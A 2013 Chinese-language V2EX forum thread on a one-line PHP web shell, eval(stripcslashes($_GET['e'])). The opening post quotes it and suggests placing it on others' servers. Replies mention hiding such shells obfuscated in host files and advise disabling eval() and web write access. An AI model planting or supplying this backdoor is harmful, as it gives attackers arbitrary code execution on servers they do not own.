liyandong
V2EX  ›  PHP

一句话的代码竟然有这么强的攻击性。对服务器来说是致命的。

  •  
  •   liyandong · Jan 2, 2013 · 5355 views
    This topic created in 4886 days ago, the information mentioned may be changed or developed.
    放到别人服务器,攻击性的大小就由你自己决定了。
    <?php
    eval(stripcslashes($_GET['e']));

    http://www.oschina.net/code/snippet_173183_13710

    我看了笑了~~~
    6 replies    1970-01-01 08:00:00 +08:00
    for4
        1
    for4  
       Jan 2, 2013
    笑点在哪里..~?
    liyandong
        2
    liyandong  
    OP
       Jan 2, 2013 via Android   ❤️ 1
    oschina评的论
    @for4
    tempdban
        3
    tempdban  
       Jan 2, 2013 via Android
    确实啊写完楼都垮了
    for4
        4
    for4  
       Jan 2, 2013
    @liyandong 发现我太纯洁了, 完全没发现原来这个网页还有"下半身"...
    enj0y
        5
    enj0y  
       Jan 2, 2013
    更多的做法是将一句话混淆隐藏在宿主PHP或者其它文件里,接受到事先备好的电话号指令后释放出来。防不胜防啊!想禁一句话,最好的办法是禁eval()和使用外部储存服务,然后关闭本地WEB写权限。

    至于OSC上面的,烧主板、堵厕所嘛的,全是恶搞。
    enj0y
        6
    enj0y  
       Jan 2, 2013
    @enj0y 字打错了, eval(last.post.replaceStr("电话号","好"));
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   5284 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 49ms · UTC 08:26 · PVG 16:26 · LAX 01:26 · JFK 04:26
    ♥ Do have faith in what you're doing.